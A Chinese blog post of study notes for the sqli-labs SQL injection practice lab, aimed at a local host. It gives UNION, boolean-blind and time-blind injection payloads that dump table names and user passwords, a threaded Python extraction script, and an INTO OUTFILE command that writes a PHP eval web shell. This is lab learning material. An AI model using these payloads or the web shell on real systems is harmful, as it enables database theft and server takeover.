个人学习-SQL 记录

版权声明:转载 请说明 https://blog.csdn.net/qq_38063791/article/details/83824991

1-5

'''
URL 参数在进入数据库之前会先被 URL 解码，但 SQL 语句内部的字符串字面量不会再被解码；当引号被过滤/转义时，字符串要写成十六进制字面量（0x...），这样就不需要引号。
python 求 hex：先把字符串按 ASCII 编码成字节，再转成十六进制，例如 'security'.encode().hex() -> 7365637572697479，使用时前面加 0x。

第一关
CONCAT_WS(sep,s1,s2...,sn)：第一个参数 sep 是分隔符，把 s1,s2...,sn 用 sep 连接成字符串
注意第一个参数是分隔符，下面这种写法会把 @@version 当作分隔符，版本号不会出现在结果里：
concat_ws(@@version,database(),user())      -- 错误
concat_ws(0x7C,@@version,database(),user()) -- 正确，0x7C 是 '|'
获取所有数据库名（子查询放在 union select 的某一列里，下面放在第 3 列）
' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)#


得到 基本信息
union select 1,concat_ws(0x7C,@@version,database(),user()),3  #
注意：原笔记里的 0x757365722829 只是字符串 "user()" 的 hex，放进去只会原样输出文本 user()，不会返回当前用户；函数必须直接写 user()。
数据库名 security 的 hex
0x7365637572697479   （原笔记写的 0x736563757269747927 末尾多了 27，即引号 ' 本身，不能包含进去，否则比较的是 "security'"）
得表名
%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%20%20%23
得字段名
id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%20%20%23

得数据:
' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23   （注意是 ASCII 单引号 '，不是中文引号 ’）




第三关
id=-1')order by 3 %23
爆字段
id=-1%27)union%20select%201,2,3%20%23


基本信息:
id=-1%27)union%20select%201,(select%20concat_ws(0x7C,database(),@@version,user())),3%20%23
（原写法 concat_ws(database(),@@version,user()) 会把 database() 当成分隔符，库名不会出现在结果里）

得表名
-1%27)union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479),3%20%23

得字段名:

id=-1%27)union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20and%20table_schema=0x7365637572697479),3%20%23   （与上面得表名一样，末尾要带 %20%23 注释掉原语句剩余部分）


第四关:
爆出字段
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 #

然后 得表名（子查询放进第 2 列）
id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=(select database())),3 #

最后 得数据（与第一关相同，只是闭合方式换成 ")）
id=-1") union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users) #

6-9

import requests



'''
第6关
http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and 0 or (length(database())=8) #
'''



'''
第7关

http://127.0.0.1/sqli-labs-master/Less-7/?id=2%27))%20and%200%20or%20(length(database())=8)%23

'''

'''
第8关 完整
'''
import requests
from multiprocessing.dummy import Pool
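messagr = []  # characters recovered so far; filled by expoit() from worker threads

# Target of this lab (sqli-labs Less-8, boolean-based blind injection on `id`).
# The page contains "You are in" only when the injected condition is true, so
# each request answers one yes/no question:
# "is byte `start` of the secret equal to ASCII code `num`?"
BASE = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 0 or "

# One URL template per extraction stage. Each takes two %d: (byte position, ASCII code).
# Before running a stage, find the total length with the matching length() probe and
# pass it to main(), e.g.
#   ... and 0 or (length((select database()))=8)#
#   ... and 0 or (length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29)#
#   ... and 0 or (length((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()))=122)#
#   ... and 0 or (length((select group_concat(id,0x7c,username,0x7c,password) from security.users))=218)#
STAGES = {
    # current database name
    "database": BASE + "(ascii(substr((select database()),%d,1))=%d)",
    # table names of the current database (observed length: 29)
    "tables": BASE + "(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d)",
    # column names of `users` (0x7573657273 = 'users'); observed length: 122
    # (the "20" in the original note looks like a leftover, the probe used 122)
    "columns": BASE + "(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database()),%d,1))=%d)",
    # rows id|username|password from security.users (observed length: 218)
    "data": BASE + "(ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users),%d,1))=%d)",
}

# Stage currently being extracted. Previously the three templates were assigned to
# `poc` one after another so only the last one was ever used; select explicitly instead.
# main(218) at the bottom of the file corresponds to the "data" stage.
poc = STAGES["data"]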

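def expoit(start, num, poc):
    """Ask the lab one yes/no question: is byte `start` of the secret chr(num)?

    Runs in a worker thread (see main()). On a hit the character is recorded
    together with its position, because workers finish in arbitrary order:
    appending bare characters (as the original did) scrambled the printed
    result whenever a later position answered before an earlier one.

    Args:
        start: 1-based byte position passed to substr().
        num:   ASCII code being tested.
        poc:   URL template with two %d placeholders (position, ASCII code).
    """
    # '%20' in the template would break the %-formatting, so restore spaces first;
    # the trailing '%20%23' is " #" and comments out the rest of the original query.
    url = poc.replace('%20', ' ') % (start, num) + '%20%23'
    response = requests.get(url)
    # The lab page contains this text only when the injected condition is true.
    if 'You are in' in response.text:
        messagr.append((start, chr(num)))
        # sort by position so concurrently arriving hits print in the right order
        print('数据库:', ''.join(ch for _, ch in sorted(messagr)))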

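def main(starts):
    """Brute-force every byte position 1..starts against candidate ASCII codes.

    One request per (position, candidate) pair is dispatched to a thread pool.
    The AsyncResult of every task is collected and .get() is called on it:
    apply_async() silently drops worker exceptions otherwise, so a connection
    error would just leave a hole in the recovered string without any notice.

    Args:
        starts: total length of the secret, found beforehand with a length() probe.
    """
    pool = Pool()
    pending = [
        pool.apply_async(expoit, args=(start, num, poc))
        for start in range(1, starts + 1)
        # 31..127 as in the original note; printable ASCII is 32..126, the extra
        # two codes only cost a request each
        for num in range(31, 128)
    ]
    pool.close()
    failures = 0
    for task in pending:
        try:
            task.get()  # re-raises the worker's exception, if any
        except Exception as exc:  # report but keep the sweep going
            failures += 1
            print('request failed:', exc)
    pool.join()
    if failures:
        print('%d requests failed; the recovered string may have gaps' % failures)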

if __name__ == '__main__':
    # 218 = length of group_concat(id,0x7c,username,0x7c,password) from
    # security.users as measured with the length() probe in the notes above;
    # it must match whichever stage `poc` is currently set to.
    secret_length = 218
    main(secret_length)

'''
 select "<?php @eval($_POST['giantbranch']);?>" into outfile "XXX/test.php" 
 注意：MySQL 字符串里 `\t` 会被解析为制表符，原来的 "XXX\test.php" 实际写到的是 "XXX<TAB>est.php"；路径分隔符用 `/` 或写成 `\\`。
 前提：当前数据库账号有 FILE 权限、secure_file_priv 没有禁止/限制写入目标目录，且目标目录对 MySQL 进程可写并位于 web 根目录下。仅用于本地靶场。
'''



'''
9 10

页面无任何回显（既无数据也无真/假提示），只能用时间盲注：条件为假时执行 sleep()，靠响应延迟判断真假。延迟要明显大于网络抖动，并对同一结果重复验证几次。
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23 
第 10 关同理，只是闭合符不同（推测与第 6 关一样是 "，需自行验证）。

'''






转载自blog.csdn.net/qq_38063791/article/details/83824991